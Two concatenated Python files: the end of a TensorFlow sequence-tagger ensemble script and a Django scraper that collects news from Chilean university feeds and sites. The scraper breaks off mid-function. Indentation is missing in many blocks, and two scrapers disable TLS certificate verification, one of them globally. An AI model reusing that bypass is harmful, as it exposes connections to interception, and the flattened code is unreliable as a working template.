mparams = get_model_params(args.model_name)
params = merge_params(params, mparams)
params.parse(args.model_params)
dparams = decoding_params()
params = merge_params(params, dparams)
params.parse(args.decoding_params)
if args.emb_path:
if "glove" in args.emb_path:
emb = load_glove_embedding(args.emb_path, None)
else:
emb = np.loadtxt(args.emb_path).astype("float32")
else:
emb = None
vocabularies = get_ensemble_vocabulary(params.vocab_path)
model_var_lists = []
model_params_list = []
for i in range(len(args.checkpoints)):
cparams = copy.copy(params)
cparams.add_hparam("embedding", emb)
cparams.add_hparam("vocabulary", vocabularies[i])
model_params_list.append(cparams)
# load checkpoints
for checkpoint in args.checkpoints:
var_list = tf.train.list_variables(checkpoint)
values = {}
reader = tf.train.load_checkpoint(checkpoint)
for (name, shape) in var_list:
if not name.startswith("tagger"):
continue
if name.find("losses_avg") >= 0:
continue
tensor = reader.get_tensor(name)
values[name] = tensor
model_var_lists.append(values)
# build graph
inputs = tf.placeholder(tf.int32, [None, None], "inputs")
preds = tf.placeholder(tf.int32, [None, None], "preds")
embedding = tf.placeholder(tf.float32, [None, None, None], "embedding")
mask = tf.placeholder(tf.float32, [None, None], "mask")
features = {"inputs": inputs, "preds": preds}
if emb is not None:
features["embedding"] = embedding
features["mask"] = mask
predictions = []
for i in range(len(args.checkpoints)):
with tf.variable_scope("tagger_%d" % i):
model_fn = get_tagger_model(params.model_name,
tf.contrib.learn.ModeKeys.INFER)
outputs, probs = model_fn(features, model_params_list[i])
predictions.append(probs)
labels = []
ivocab = {}
for k, idx in vocabularies[0]["targets"].items():
ivocab[idx] = k
for idx in range(len(ivocab)):
labels.append(ivocab[idx])
tparams = get_transition_params(labels)
# create session
with tf.Session(config=session_config(params)) as sess:
tf.global_variables_initializer().run()
# restore variables
all_var_list = tf.trainable_variables()
for i in range(len(args.checkpoints)):
uninit_var_list = []
for v in all_var_list:
if v.name.startswith("tagger_%d" % i):
uninit_var_list.append(v)
set_variables(uninit_var_list, model_var_lists[i], "tagger_%d" % i)
# create input_fn
all_sorted_inputs = []
all_sorted_keys = []
all_input_fns = []
for i in range(len(args.checkpoints)):
sorted_inputs, sorted_keys, num_batches, fn = get_sorted_input_fn(
params.data_path,
model_params_list[i].vocabulary["inputs"],
params.decode_batch_size * len(params.device_list),
model_params_list[i]
)
all_sorted_inputs.append(sorted_inputs)
all_sorted_keys.append(sorted_keys)
all_input_fns.append(fn)
decodes = []
for i, input_fn in enumerate(all_input_fns):
outputs = []
for features in input_fn:
feed_dict = {
inputs: features["inputs"],
preds: features["preds"]
}
if args.emb_path:
feed_dict[embedding] = features["embedding"]
feed_dict[mask] = features["mask"]
output = sess.run(predictions[i], feed_dict=feed_dict)
outputs.append(output)
decodes.append(outputs)
        # ensemble: average the per-model probability distributions
        decodes = list(zip(*decodes))
        probs = []
        for item in decodes:
            # [batch, max_len, num_label]
            probs.append(sum(item) / float(len(item)))
        # decode the averaged distributions back into label sequences
        sorted_inputs = all_sorted_inputs[0]
        sorted_keys = all_sorted_keys[0]
        text_decodes = []
        count = 0
        for item in probs:
            for dist in item:
                inputs = sorted_inputs[count]
                seq_len = len(inputs.strip().split()[1:])
                output_text = []
                dist = dist[:seq_len, :]
                if args.viterbi:
                    outputs, _ = tf.contrib.crf.viterbi_decode(dist, tparams)
                else:
                    outputs = np.argmax(dist, axis=1)
                index = 0
                while index < seq_len:
                    output_text.append(ivocab[outputs[index]])
                    index += 1
                # decode to plain text
                text_decodes.append(" ".join(output_text))
                count += 1
        sorted_inputs.reverse()
        text_decodes.reverse()
        outputs = []
        for index in range(len(sorted_inputs)):
            outputs.append(text_decodes[sorted_keys[index]])
if not args.output_name:
base_filename = os.path.basename(params.data_path)
model_name = params.model_name
decode_filename = base_filename + "." + model_name + ".decodes"
else:
decode_filename = args.output_name
outfile = tf.gfile.Open(decode_filename, "w")
for output in outputs:
outfile.write("%s\n" % output)
outfile.close()
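# Reference-only: a minimal NumPy sketch of the Viterbi decoding step invoked
# above via tf.contrib.crf.viterbi_decode. `score` is a [seq_len, num_tags]
# emission-score matrix and `trans` a [num_tags, num_tags] transition matrix
# (as built by get_transition_params). This is an assumed, illustrative
# re-implementation for readers, not the library's internals.
def _viterbi_decode_reference(score, trans):
    seq_len, num_tags = score.shape
    trellis = np.zeros_like(score)
    backpointers = np.zeros((seq_len, num_tags), dtype=np.int32)
    trellis[0] = score[0]
    for t in range(1, seq_len):
        # v[i, j]: best score of a path ending in tag i at t-1 then moving to j
        v = trellis[t - 1][:, None] + trans
        trellis[t] = score[t] + v.max(axis=0)
        backpointers[t] = v.argmax(axis=0)
    # Walk the backpointers from the best final tag
    best_path = [int(trellis[-1].argmax())]
    for t in range(seq_len - 1, 0, -1):
        best_path.append(int(backpointers[t][best_path[-1]]))
    best_path.reverse()
    return best_path, float(trellis[-1].max())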
def helpinfo():
print("usage:")
print("\tmain.py <command> [<args>]")
print("using 'main.py train --help' to see training options")
print("using 'main.py predict --help' to see prediction options")
print("using 'main.py ensemble --help' to see ensembling options")
if __name__ == "__main__":
if len(sys.argv) == 1:
helpinfo()
else:
command = sys.argv[1]
if command == "train":
print("training command:")
print(" ".join(sys.argv))
parsed_args = parseargs_train(sys.argv[2:])
train(parsed_args)
elif command == "predict":
parsed_args = parseargs_predict(sys.argv[2:])
predict(parsed_args)
elif command == "ensemble":
parsed_args = parseargs_ensemble(sys.argv[2:])
ensemble(parsed_args)
else:
helpinfo()
|
views.py
|
from django.shortcuts import render
from news.models import Universidad, Noticia
from bs4 import BeautifulSoup
from django.conf import settings
import feedparser, unicodedata, urllib.request, time, re, datetime, threading
import ssl
import dateutil.parser
import logging
import unidecode
import json
result = []
# Create your views here.
def scraper(request):
hora = {}
hora["start"] = time.strftime("%H:%M:%S")
hora_inicio = time.time()
    if not settings.DEBUG:
        # Use threads in production
        logging.basicConfig(level=logging.DEBUG, format='[%(levelname)s] - %(threadName)-10s : %(message)s')
universidades = [
{'target':pucv, 'name':'PUCV'},
{'target':ucn, 'name':'UCN'},
{'target':utfsm, 'name':'UTFSM'},
{'target':uv, 'name':'UV'},
{'target':upla, 'name':'UPLA'},
{'target':udec, 'name':'UDEC'},
{'target':utalca, 'name':'UTALCA'},
{'target':ulagos, 'name':'ULAGOS'},
{'target':unap, 'name':'UNAP'},
{'target':ua, 'name':'UA'},
{'target':uda, 'name':'UDA'},
{'target':userena, 'name':'USERENA'},
{'target':uoh, 'name':'UOH'},
{'target':ucm, 'name':'UCM'},
{'target':ubiobio, 'name':'UBIOBIO'},
{'target':ucsc, 'name':'UCSC'},
{'target':ufro, 'name':'UFRO'},
{'target':uct, 'name':'UCT'},
{'target':uach, 'name':'UACH'},
{'target':uaysen, 'name':'UAYSEN'},
{'target':umag, 'name':'UMAG'},
{'target':uta, 'name':'UTA'}
]
        # Launch one worker thread per university
for universidad in universidades:
threading.Thread(target=universidad['target'], name=universidad['name']).start()
else:
        # This way of running the scrapers is very slow,
        # but the uninews.datoslab.cl/scraper panel only shows error and status
        # details when this method is used.
        # Use for development only.
        #pucv() # Working
        #ucn() # Working
        #utfsm() # Working
        #uv() # Working
        #upla() # Working #Needs review
        #udec() # Working
        #utalca() # Working #Needs review
        #ulagos() # Working
        #ucsc() # Working
        #ubiobio() # Working
        #uda() # Working
        #userena() # Working #Needs review
        # unap() # Working
        #ua() # Working
        # uoh() # Could not be scraped - page built with Angular
        # ucm() # Working
        ufro() # Working
        # uct() # Working - performance caveats
        # uach() # Working
        # uaysen() # Working
        # umag() # Working - review the summary extraction
        # uta() # Working
hora_fin = time.time()
hora["finish"] = time.strftime("%H:%M:%S")
hora["total"] = hora_fin - hora_inicio
result.append({'status':"", 'error_message':'', 'universidad':'', 'titulo':'', 'bajada':'', 'fecha':'', 'link_noticia':'', 'link_recurso':'', 'categoria':''})
return render(request, "scraper/scraper.html", {'result':result, 'hora':hora})
def saveNew(new):
try:
        # Look up the article in the database.
        # If it is not found, Noticia.DoesNotExist is raised and the except branch runs.
n = Noticia.objects.get(titulo=new['titulo'], id_universidad__alias = new['universidad'].alias)
print(new['universidad'].alias + ": " + new['titulo'] + " | Existe")
e = "Existe"
        # If it already exists, record a message for the debug screen
result.append({'status':"exist", 'error_message':e, 'universidad':new['universidad'], 'titulo':new['titulo'], 'bajada':new['bajada'], 'fecha':new['fecha'], 'link_noticia':new['link_noticia'], 'link_recurso':new['link_recurso'], 'categoria':new['categoria']})
except Noticia.DoesNotExist as e:
        # If the article does not exist yet, create it
n = Noticia(
titulo=new['titulo'],
titulo_busqueda=formatear_busqueda(new['titulo']),
bajada=new['bajada'],
bajada_busqueda=formatear_busqueda(new['bajada']),
fecha=new['fecha'],
link_noticia=new['link_noticia'],
link_recurso=new['link_recurso'],
id_universidad=new['universidad'],
categoria=new['categoria'],
contador_visitas=0
)
        n.save() # Persist the article in the database
print(new['universidad'].alias + ": " + new['titulo'] + " | Insertada")
e = "Insertada"
result.append({'status':"ok", 'error_message':e, 'universidad':new['universidad'], 'titulo':new['titulo'], 'bajada':new['bajada'], 'fecha':new['fecha'], 'link_noticia':new['link_noticia'], 'link_recurso':new['link_recurso'], 'categoria':new['categoria']})
def formatear_busqueda(text):
    # Any change here must also be mirrored in search_fix in the news app views
text = unidecode.unidecode(text).lower()
text = text.replace('"', "")
text = text.replace('?', "")
text = text.replace('¿', "")
text = text.replace(':', "")
text = text.replace('#', "")
text = text.replace('.', "")
text = text.replace(',', "")
text = text.replace(';', "")
text = text.replace('(', "")
text = text.replace(')', "")
return text
def formatear_fecha(fecha, universidad):
if universidad == "uv":
fecha = fecha.split()
dia = fecha[0]
mes = fecha[2].lower()
anno = fecha[4]
elif universidad == "upla":
fecha = fecha.split()
dia = fecha[1]
mes = fecha[2].lower()
anno = fecha[3]
elif universidad == "ufsm":
fecha = fecha.split()
dia = fecha[1]
mes = fecha[2].lower()
anno = fecha[3]
elif universidad == "ucn":
fecha = fecha.split()
dia = fecha[1]
mes = fecha[2].lower()
anno = fecha[3]
elif universidad == "pucv":
fecha = fecha.split()
dia = fecha[1]
mes = fecha[3].lower()
anno = fecha[5]
elif universidad == "udec":
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == "utalca":
fecha = fecha.lower().split()
dia = fecha[0]
mes = fecha[1]
anno = fecha[2]
elif universidad == "ulagos":
fecha = fecha.lower().split('/')
dia = fecha[0]
mes = fecha[1]
anno = fecha[2]
elif universidad == "ucsc":
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == "ubiobio":
fecha = fecha.split()
dia = fecha[1]
mes = fecha[2].lower()
anno = fecha[3]
elif universidad == 'uda':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'userena':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'unap':
fecha = fecha.lower().split()
dia = fecha[1]
mes = fecha[3]
anno = fecha[5]
elif universidad == 'ua':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'ucm':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'ufro':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'uta':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'umag':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'uaysen':
fecha = fecha.lower().split()
dia = fecha[0]
mes = fecha[1]
anno = fecha[2]
elif universidad == 'uach':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'uct':
fecha = fecha.lower().split()
dia = fecha[0]
mes = fecha[1]
anno = fecha[2]
if mes == "enero" or mes == "jan" or mes == '1':
mes = '01'
elif mes == "febrero" or mes == "feb" or mes == '2':
mes = '02'
elif mes == "marzo" or mes == "mar" or mes == '3':
mes = '03'
elif mes == "abril" or mes == "apr" or mes == '4':
mes = '04'
elif mes == "mayo" or mes == "may" or mes == '5':
mes = '05'
elif mes == "junio" or mes == "jun" or mes == '6':
mes = '06'
elif mes == "julio" or mes == "jul" or mes == '7':
mes = '07'
elif mes == "agosto" or mes == "aug" or mes == '8':
mes = '08'
elif mes == "septiembre" or mes == "sep" or mes == '9':
mes = '09'
elif mes == "octubre" or mes == "oct" or mes == '10':
mes = '10'
elif mes == "noviembre" or mes == "nov" or mes == '11':
mes = '11'
elif mes == "diciembre" or mes == "dec" or mes == '12':
mes = '12'
if dia == "1":
dia = '01'
elif dia == "2":
dia = '02'
elif dia == "3" :
dia = '03'
elif dia == "4":
dia = '04'
elif dia == "5":
dia = '05'
elif dia == "6":
dia = '06'
elif dia == "7":
dia = '07'
elif dia == "8":
dia = '08'
elif dia == "9":
dia = '09'
#fecha = dia + "/" + mes + "/" + anno
fecha = anno + "-" + mes + "-" + dia
return fecha
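# Illustrative examples (input strings are assumptions): a UV-style date such
# as "14 de agosto de 2020" is returned as "2020-08-14", and a UDEC RSS date
# such as "Tue, 11 Aug 2020 12:00:00 +0000" is returned as "2020-08-11".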
# Cleans up each category string
def setCategoria(categoria = ''):
if categoria == '' or categoria == None:
return 'sin-categoria'
else:
categoria = categoria.lower()
categoria = elimina_tildes(categoria)
categoria = categoria.replace(" ", "-")
categoria = categoria.replace("&", "y")
categoria = categoria.replace("#", "")
categoria = categoria.replace(",", "-")
return categoria
def elimina_tildes(s):
return ''.join((c for c in unicodedata.normalize('NFD', s) if unicodedata.category(c) != 'Mn'))
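# Illustrative examples of the normalization helpers (inputs are assumptions):
#   formatear_busqueda('Investigación: "Nuevos avances"') -> 'investigacion nuevos avances'
#   setCategoria('Gestión Institucional') -> 'gestion-institucional'
#   elimina_tildes('Investigación') -> 'Investigacion'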
# Universidad de Playa Ancha
def upla():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UPLA')
url_rss = "https://www.upla.cl/noticias/feed/" # URL de feed RSS
feed = feedparser.parse( url_rss ) # Se obtiene el XML y se procesa
for item in feed['items']:
try:
titulo = item['title']
bajada = item['summary']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "upla")
            # Get and normalize the category so it can be looked up
categoria_busqueda = setCategoria(item['category'])
if categoria_busqueda == 'gestion-institucional':
categoria_busqueda = 'gestion'
            # Open each category's listing page and collect all of its articles
contents = urllib.request.urlopen("https://www.upla.cl/noticias/category/"+categoria_busqueda).read()
bs = BeautifulSoup(contents, "html.parser")
            # Adjust for categories whose pages have a different layout
if categoria_busqueda == 'coronavirus':
articles = bs.find_all("div", ["timeline-content"])
else:
articles = bs.find_all("article", ["item-list"])
            # For each article in the category listing, read its title
for article in articles:
if categoria_busqueda == 'coronavirus':
titulo_articulo = article.h2.a.text
else:
titulo_articulo = article.find("a").text
                # If the listed title matches the one from the feed, take that article's image and stop
if titulo_articulo == titulo:
imagen = article.find("img")['src']
break
else:
imagen = ''
            # Save the article to the database
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
            # If an error occurs, record it individually so it can be shown
            # on the debug screen
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Pontificia Universidad Católica de Valparaíso
def pucv():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='PUCV')
nombre_uni = "pucv"
context = ssl._create_unverified_context()
contents = urllib.request.urlopen("https://www.pucv.cl/pucv/site/tax/port/all/taxport_1___1.html", context=context).read()
bs = BeautifulSoup(contents, "html.parser")
articulos = bs.find_all("article")
for articulo in articulos:
        try:
            # Default so the warning handlers below never reference an
            # undefined category on the first pass
            categoria_busqueda = 'sin-categoria'
            link = articulo.a['href']
            link = "https://www.pucv.cl" + link.replace("..", "")
            fecha = articulo.find("span",{"class":"fecha aright"})
imagen = articulo.img['src']
imagen = "https://pucv.cl" + imagen.replace("..","")
pagina_noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(pagina_noticia, "html.parser")
titulo = bs_noticia.find("h1", { "class" : "titular" }).text
if fecha is None:
fecha = time.strftime("%Y-%m-%d")
else:
fecha = formatear_fecha(fecha.text,nombre_uni)
try:
bajada = bs_noticia.find("p",{ "class" : "bajada" }).text
except Exception as e:
bajada = ''
result.append({'status':"warning", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
            # Fall back when no category can be found
try:
newpage = urllib.request.urlopen(link).read()
bs_cate = BeautifulSoup(newpage, "html.parser")
categoria = bs_cate.find("div",{ "class" : "breadcrumbs" })
categorias = categoria.findAll("a")
category = categorias[2].text
categoria_busqueda = setCategoria(category)
except Exception as e:
categoria_busqueda = 'sin-categoria'
result.append({'status':"warning", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
saveNew({'status':"ok", 'error_message':'', 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad Católica del Norte
def ucn():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UCN')
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
d = feedparser.parse("https://www.noticias.ucn.cl/feed/")
for e in d.entries:
try:
titulo = (e.title)
nombre_uni = "ucn"
link = (e.link)
categoria_busqueda = setCategoria((e.category))
fecha = e.published
fecha = formatear_fecha(fecha,nombre_uni)
description = e.description.split("/>")
bajada = description[1]
cuerpo = e['content']
contenido = cuerpo[0].value
            imagen = re.search(r'(?P<url>https?://[^\s]+(png|jpeg|jpg))', contenido).group("url").replace("-150x150", "")
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
#Universidad Técnico Federico Santa María
def utfsm():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UTFSM')
d = feedparser.parse("https://noticias.usm.cl/feed/")
for e in d.entries:
try:
titulo = (e.title)
nombre_uni = "ufsm"
link = (e.link)
categoria_busqueda = setCategoria((e.category))
bajada = (e.description).replace("[…]", "").strip()
fecha = e.published
fecha = formatear_fecha(fecha,nombre_uni)
cuerpo = e['content']
contenido = cuerpo[0].value
try:
                imagen = re.search(r'(?P<url>https?://[^\s]+(png|jpeg|jpg))', contenido).group("url")
except:
imagen = ''
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Valparaíso
def uv():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UV')
contents = urllib.request.urlopen("https://www.uv.cl/pdn/archivo/").read()
bs = BeautifulSoup(contents, "html.parser")
divs = bs.find_all("div", ["item n_caja borde6", "item n_caja borde6 fin"])
for div in divs:
try:
fecha = div.find("div", ["fecha"]).text
fecha = formatear_fecha(fecha, "uv")
link = div.a['href']
link = "https://www.uv.cl/pdn" + link.replace("..", "")
            # Open the article's page
pagina_noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(pagina_noticia, "html.parser")
titulo = bs_noticia.find("div", id="n_titulo").text
bajada = bs_noticia.find("div", id="n_bajada").text
try:
imagen = bs_noticia.find("div", id="n_clipex").img['src']
imagen = "https://www.uv.cl" + imagen
except TypeError:
imagen = div.find("img", ["sombra"])['src']
imagen = "https://www.uv.cl/pdn" + imagen.replace("..", "")
categoria_busqueda = setCategoria()
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Concepción
def udec():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UDEC')
url_rss = "https://noticias.udec.cl/feed/"
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
link = item['link']
bajada = BeautifulSoup(item['summary'], "html.parser").find('p').text.strip()
fecha = item['published']
fecha = formatear_fecha(fecha, "udec")
categoria_busqueda = setCategoria(item['category'])
imagen = BeautifulSoup(urllib.request.urlopen(link).read(), "html.parser").find_all('img', {'class': 'attachment-large size-large'})[1]['src']
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Talca
def utalca():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UTALCA')
contents = urllib.request.urlopen("https://www.utalca.cl/noticias/").read()
bs = BeautifulSoup(contents, "html.parser")
items = bs.find('div', {'class': 'section-news'})
items = items.find_all("div", {"class": "card-news"})
    items = list(set(items)) # Remove duplicate items
for item in items:
try:
link = item.a['href']
titulo = item.find("h5").text
if item.div.p is None:
categoria_busqueda = setCategoria()
else:
categoria_busqueda = setCategoria(item.div.p.text)
noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(noticia, "html.parser")
bajada = bs_noticia.find("div", {"class": "interior-body"}).h6.text
fecha = bs_noticia.find("div", {"class": "interior-body"}).span.text
fecha = formatear_fecha(fecha, 'utalca')
imagen = bs_noticia.find("img", {"class": "attachment-post-thumbnail size-post-thumbnail wp-post-image"})['src']
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Los Lagos
def ulagos():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='ULAGOS')
items = []
categorias = ['campus-osorno', 'campus-pto-montt', 'sede-santiago', 'sede-chiloe']
for categoria in categorias:
contents = urllib.request.urlopen("https://www.ulagos.cl/category/" + categoria + "/").read()
bs = BeautifulSoup(contents, "html.parser")
items.extend(bs.find_all("div", {"class": "ultimas-noticias"}))
for item in items:
try:
link = item.a['href']
titulo = item.find("div", {"class": "overflow_titulo_noticias"}).text.strip()
noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(noticia, "html.parser")
bajada = bs_noticia.find("div", {"class":"title-post"}).span.text.strip()
categoria_busqueda = bs_noticia.find("div", {"class":"category-post"}).a.text.lower().strip()
categoria_busqueda = setCategoria(categoria_busqueda)
fecha = bs_noticia.find("div", {"class":"conten-post-date"}).text.strip()
fecha = formatear_fecha(fecha, "ulagos")
if bs_noticia.find("img", {"class": "img-destacado"}) is None:
imagen = ''
else:
imagen = bs_noticia.find("img", {"class": "img-destacado"})["src"]
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad Católica de la Santísima Concepción
def ucsc():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UCSC')
contents = urllib.request.urlopen("https://www.ucsc.cl/noticias/").read()
bs = BeautifulSoup(contents, "html.parser")
items = bs.find_all("article", {"class": "hentry-news"})
    items = list(set(items)) # Remove duplicate items
for item in items:
try:
link = item.header.h2.a['href']
titulo = item.header.h2.a.text
fecha = item.header.p.time['datetime']
fecha = formatear_fecha(fecha, 'ucsc')
noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(noticia, "html.parser")
bajada = bs_noticia.find("div", {"class": "entry-summary"}).p.text
try:
imagen = bs_noticia.find("article", {"class": "hentry hentry-news"}).header.span.img['src']
except Exception as e:
imagen = ''
categoria_busqueda = bs_noticia.find("a", {"rel": "category tag"})
categoria_busqueda = setCategoria(categoria_busqueda.text)
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad del Bío-Bío
def ubiobio():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UBIOBIO')
d = feedparser.parse("http://noticias.ubiobio.cl/feed/")
for e in d.entries:
try:
titulo = (e.title)
link = (e.link)
categoria_busqueda = setCategoria(e.category)
bajada = (e.description).replace("[…]", "")
bs_bajada = BeautifulSoup(bajada, "html.parser")
bajada = bs_bajada.find("p").text
fecha = e.published
fecha = formatear_fecha(fecha,'ubiobio')
cuerpo = e['content']
contenido = cuerpo[0].value
            imagen = re.search(r'(?P<url>https?://[^\s]+(png|jpeg|jpg))', contenido).group("url")
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad Arturo Prat
def unap():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UNAP')
url_base = 'https://www.unap.cl'
urls_news = {
'investigacion': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_13_48__1.html',
'vinculacion': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_38_39__1.html',
'acreditacion': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_83_113__1.html',
'casa-central': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_15__1.html',
'sede-victoria': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_17__1.html',
'noticias-arica': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_12__1.html',
'noticias-antofagasta': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_14__1.html',
'noticias-santiago': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_16__1.html'
}
for cat, url in urls_news.items():
contents = urllib.request.urlopen(url).read()
bs = BeautifulSoup(contents, "html.parser")
items = bs.find_all("div", {"class": "taxport-item"})
        items = list(set(items)) # Remove duplicate items
for item in items:
try:
link = url_base + item.find("div", {"class": "titular"}).a['href'].strip()
titulo = item.find("div", {"class": "titular"}).a.text.strip()
fecha = item.find("div", {"class": "fecha"}).text.strip()
fecha = formatear_fecha(fecha, 'unap')
noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(noticia, "html.parser")
try:
bajada = bs_noticia.find(id='content').find('h2', {'class': 'bajada'}).text.strip()
except Exception:
bajada = bs_noticia.find("div", {"class": "CUERPO"}).find_all('p')
for b in bajada:
b = b.text.strip()
                        if b: # If this paragraph is not empty, use it as the summary and stop
bajada = b
break
try:
imagen = url_base + bs_noticia.find("div", {"class": "CUERPO"}).find("img")['src'].strip()
except Exception:
imagen = ''
categoria_busqueda = setCategoria(cat)
